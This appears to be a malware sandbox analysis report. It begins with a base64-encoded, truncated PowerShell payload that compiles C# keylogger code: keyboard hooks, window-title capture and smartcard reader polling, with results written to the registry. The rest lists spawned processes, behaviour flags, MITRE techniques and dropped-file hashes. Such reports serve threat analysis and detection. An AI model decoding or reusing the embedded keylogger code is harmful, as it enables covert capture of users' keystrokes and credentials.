ApACAAPQA9ACAAMAApAHsATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABhADcANgAgAD0AIABjADYAMAAoAGgANwA1ACkAOwBpAG4AdAAgAGEANwA3ACAAPQAgAGEANwA2AC4AQwBvAHUAbgB0ADsAaQBmACAAKABhADcANwAgAD4AIAAwACkAewBpAG4AdAAgAGcANwA4ACAAPQAgADAAOwBjADIAOABbAF0AIABlADcAOQAgAD0AIABuAGUAdwAgAGMAMgA4AFsAYQA3ADcAXQA7AGYAbwByAGUAYQBjAGgAIAAoAHMAdAByAGkAbgBnACAAZwA4ADAAIABpAG4AIABhADcANgApAHsAZQA3ADkAWwBnADcAOABdAC4AbQAyADkAIAA9ACAAZwA4ADAAOwBnADcAOAArACsAOwB9AGkAZgAgACgAUwBDAGEAcgBkAEcAZQB0AFMAdABhAHQAdQBzAEMAaABhAG4AZwBlACgAZAAyADcALAAgADUAMAAwACwAIABlADcAOQAsACAAZQA3ADkALgBMAGUAbgBnAHQAaAApACAAPQA9ACAAMAApAHsAZgBvAHIAIAAoAGkAbgB0ACAAYQA4ADEAIAA9ACAAMAA7ACAAYQA4ADEAIAA8ACAAYQA3ADcAOwAgAGEAOAAxACsAKwApAHsAaQA3ADMAIAA9ACAAZQA3ADkAWwBhADgAMQBdADsAaAA3ADIAIAArAD0AIABpADcAMwAuAG0AMgA5ADsAaQBmACAAKAAoAGkANwAzAC4AbgAzADIAIAAmACAAMAB4ADAAMAAwADAAMAAwADIAMAApACAAIQA9ACAAMAApACAAaAA3ADIAIAArAD0AIAAiACAALQAgAGYAbwB1AG4AZAAiADsAaAA3ADIAIAArAD0AIAAiAFwAcgBcAG4AIgA7AH0AfQB9AH0AfQBSAGUAZwBpAHMAdAByAHkALgBTAGUAdABWAGEAbAB1AGUAKABmADIAMAAsACAAYQAyADIALAAgAGgANwAyACkAOwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQALgBTAGwAZQBlAHAAKAAxADAAMAAwACkAOwB9AHIAZQB0AHUAcgBuACAAMAA7AH0AWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAGkAbgB0ACAAawA4ADIALAAgAHAAMwAgAGkAOAAzACwAIABJAG4AdABQAHQAcgAgAG8AOAA0ACwAIAB1AGkAbgB0ACAAawA4ADUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVQBuAGgAbwBvAGsAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAEkAbgB0AFAAdAByACAAcAA4ADYAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAEkAbgB0AFAAdAByACAAcAA4ADYALAAgAGkAbgB0ACAAZAA0ADgALAAgAEkAbgB0AFAAdAByACAAbQA0ADkALAAgAEkAbgB0AFAAdAByACAAYQA1ADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAoAHMAdAByAGkAbgBnACAAYQA4ADcAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAATQBhAHAAVgBpAHIAdAB1AGEAbABLAGUAeQAoAGkAbgB0ACAAaAA4ADgALAAgAHUAaQBuAHQAIABkADgAOQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABLAGUAeQBiAG8AYQByAGQATABhAHkAbwB1AHQAKAB1AGkAbgB0ACAAbgA5ADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVABvAFUAbgBpAGMAbwBkAGUARQB4ACgAaQBuAHQAIABiADkAMQAsACAAdQBpAG4AdAAgAGsAOQAyACwAIABiAHkAdABlAFsAXQAgAGEAOQAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAbwA5ADQALAAgAGkAbgB0ACAAYQA5ADUALAAgAHUAaQBuAHQAIABqADkANgAsACAAdQBpAG4AdAAgAG8AOQA3ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKABiAHkAdABlAFsAXQAgAGYAOQA4ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAHUAaQBuAHQAIABiADkAOQAsACAAcgBlAGYAIAB1AGkAbgB0ACAAawAxADAAMAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAHUAaQBuAHQAIABvADEAMAAxACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKAB1AGkAbgB0ACAAbwAxADAAMQAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGMAMQAwADIALAAgAGkAbgB0ACAAYgAxADAAMwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAG0AMQAwADQALAAgAHUAaQBuAHQAIABpADEAMAA1ACwAIABqADYAIABsADEAMAA2ACwAIABJAG4AdABQAHQAcgAgAG4AMQAwADcALAAgAHUAaQBuAHQAIABvADEAMAA4ACwAIABJAG4AdABQAHQAcgAgAGoAMQAwADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAEUAeABpAHQAUAByAG8AYwBlAHMAcwAoAHUAaQBuAHQAIABsADEAMQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAgAGUAMQAxADEALAAgAGIAbwBvAGwAIABiADEAMQAyACwAIABzAHQAcgBpAG4AZwAgAGsAMQAxADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAE8AcABlAG4ATQB1AHQAZQB4ACgAdQBpAG4AdAAgAGkAMQAxADQALAAgAGIAbwBvAGwAIABmADEAMQA1ACwAIABzAHQAcgBpAG4AZwAgAGsAMQAxADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHcAaQBuAHMAYwBhAHIAZAAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoAEkAbgB0ADMAMgAgAGgAMQAxADYALAAgAEkAbgB0AFAAdAByACAAaAAxADEANwAsACAASQBuAHQAUAB0AHIAIABnADEAMQA4ACwAIABvAHUAdAAgAEkAbgB0AFAAdAByACAAagAxADEAOQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdwBpAG4AcwBjAGEAcgBkAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAQQAiACwAIABDAGgAYQByAFMAZQB0ACAAPQAgAEMAaABhAHIAUwBlAHQALgBBAG4AcwBpACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwAoAEkAbgB0AFAAdAByACAAagAxADEAOQAsACAAYgB5AHQAZQBbAF0AIABjADEAMgAwACwAIABiAHkAdABlAFsAXQAgAGwAMQAyADEALAAgAG8AdQB0ACAAVQBJAG4AdAAzADIAIABiADEAMgAyACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB3AGkAbgBzAGMAYQByAGQALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEcAZQB0AFMAdABhAHQAdQBzAEMAaABhAG4AZwBlACgASQBuAHQAUAB0AHIAIABqADEAMQA5ACwAIABVAEkAbgB0ADMAMgAgAGQAMQAyADMALAAgAFsASQBuACwAIABPAHUAdABdACAAYwAyADgAWwBdACAAZQA3ADkALAAgAEkAbgB0ADMAMgAgAHAAMQAyADQAKQA7AH0AfQANAAoAIgBAACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwBbAGoAMQAuAGYAMgBdADoAOgBSAHUAbgAoACAAewAgACQAbgB1AGwAbAAgAD0AIABbAGMAbwBuAHMAbwBsAGUAXQA6ADoAQwBhAHAAcwBMAG8AYwBrACAAfQAgACkA
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1592

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w4ecxbef\w4ecxbef.cmdline"
2⤵
- Suspicious use of WriteProcessMemory
PID:804

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C3C.tmp" "c:\Users\Admin\AppData\Local\Temp\w4ecxbef\CSC7611AA252E644E6FB2A0F69D142AFDE6.TMP"
3⤵
PID:2500

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\7b42de170.js

Filesize
49KB

MD5
31657f7c605b5b8d16c85938d2bd2c46

SHA1
12eb4cb914b448cca27a178ec6d21795f66a387d

SHA256
55b7c7fce754ff5922f63d0c85d60851a2922b37e1ddd8dd0501063ed5e90f3e

SHA512
03731875fc869d4eff318ce61fea34f17c5dcd4e8a361aeccb6f6aa88d2d9eba0dbc32c14f32759c18218600a64787ab0b1131564b6215a4f1457360151d6800

Download Submit
C:\Users\Admin\AppData\Local\Temp\279155113.js

Filesize
49KB

MD5
31657f7c605b5b8d16c85938d2bd2c46

SHA1
12eb4cb914b448cca27a178ec6d21795f66a387d

SHA256
55b7c7fce754ff5922f63d0c85d60851a2922b37e1ddd8dd0501063ed5e90f3e

SHA512
03731875fc869d4eff318ce61fea34f17c5dcd4e8a361aeccb6f6aa88d2d9eba0dbc32c14f32759c18218600a64787ab0b1131564b6215a4f1457360151d6800

Download Submit
C:\Users\Admin\AppData\Local\Temp\3006510736

Filesize
40KB

MD5
b7409b6611bd7c096347fe940737f5cf

SHA1
401061ed14da11abed06c605f1f8bc5e05089291

SHA256
ebfd7c0ccbe30aa48586e9235d5e414ecff28a5463f80ddc8dfc2dd5f15aee09

SHA512
d2d0fbbcec386dfe1f1d168fc38a942df2ce350d4620e6c629c198ed26bd454353b93700a12dfcddfb714befa716d5466efd71049e63aaa8170d9f9b8d72f7e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6C3C.tmp

Filesize
1KB

MD5
2f0c5a018b5052bd3a994a1b31094cb4

SHA1
7ec97f5a0dd7deb3a5cd6337081bf684c5454fba

SHA256
9a22384d8927fcb5a50129bc1cfdace773f5d5a72628b16bc68ae5ea2731ad9b

SHA512
55bd91cbed4e5df535c998ac8dbfc4929ae86c0c6d45db0835ff15d9b5cc2485698bc7a9d7f5aac1229e028441f7c5f71997e860d1333a7ea24ee75ee41447cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\w4ecxbef\w4ecxbef.dll

Filesize
9KB

MD5
6e07ba0cdc3f358229c155ffd3504e74

SHA1
5223b244de39ff4c7b6473d415cda85b7ac11d6f

SHA256
617efbfcbabde4fab4dfe3ef752c06bb86b8c49b587c24a71bfb42c3ead604d7

SHA512
4cc1d08ab7a587c76e07f3b72565530d20f7d5753c616a7ff7416a195f3dc9ce7de81d9d37770326d9e855d66dc16125a714d46407f41bae85b057c9d8bac367

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w4ecxbef\CSC7611AA252E644E6FB2A0F69D142AFDE6.TMP

Filesize
652B

MD5
06246403f9a01459e36eb02c91cc39d9

SHA1
7f9a551ac92ae2edf19e2f9287a41ef9fe949291

SHA256
5a17a0576019b7b4eec6c5e33e931385596639bd301624b1416748119eacc4bd

SHA512
72795f6de477001915e5a6ff2059bbc3fd31b8b7a4a8a86b39e278bd8d0486fa7dee1ffb0b6f8627a7ab3a2cd55c93cba3201a2ebd253eddd579782c30b72a41

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w4ecxbef\w4ecxbef.0.cs

Filesize
7KB

MD5
1addc514404476f89b8b8ad97351c9af

SHA1
c3a9c10eb6dbaf1eb15243105016fc38379134eb

SHA256
5ff19533353f02f42ca891f03846e4d5f0f56f749aa5923912d38f495b57ae89

SHA512
439f90d9a94eced396d6ff17c3dc7269669b97809abe93cf39e7467092a8522be5299679d253680aabefcd9ff005e031425a674a0ea8a1a0e35e47e049c3c398

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w4ecxbef\w4ecxbef.cmdline

Filesize
494B

MD5
26fb971fb9918c7e1ca5c214e6e4ae36

SHA1
a8d5903ddd3de2348f815351d9d7987679c6b600

SHA256
a0dd45c1e614a2423c39cd65e378c33f04a85c50b9a43a00fdaa7cd1b03e48cb

SHA512
d34f54ecab6f1a35377d53b1ddda215bf696cf5e2fb2f7e7de421a03e440122ee4f00d7bff96c1b2d6af861a0aecd50a08d949e191e51dfe398beae2dd19e036

Download Submit
memory/804-137-0x0000000000000000-mapping.dmp

Download
memory/1592-140-0x00007FF9C4280000-0x00007FF9C4D41000-memory.dmp

Filesize
10.8MB

Download
memory/1592-136-0x00000166D93E0000-0x00000166D9402000-memory.dmp

Filesize
136KB

Download
memory/1592-145-0x00007FF9C4280000-0x00007FF9C4D41000-memory.dmp

Filesize
10.8MB

Download
memory/2500-141-0x0000000000000000-mapping.dmp

Download
memory/4300-132-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads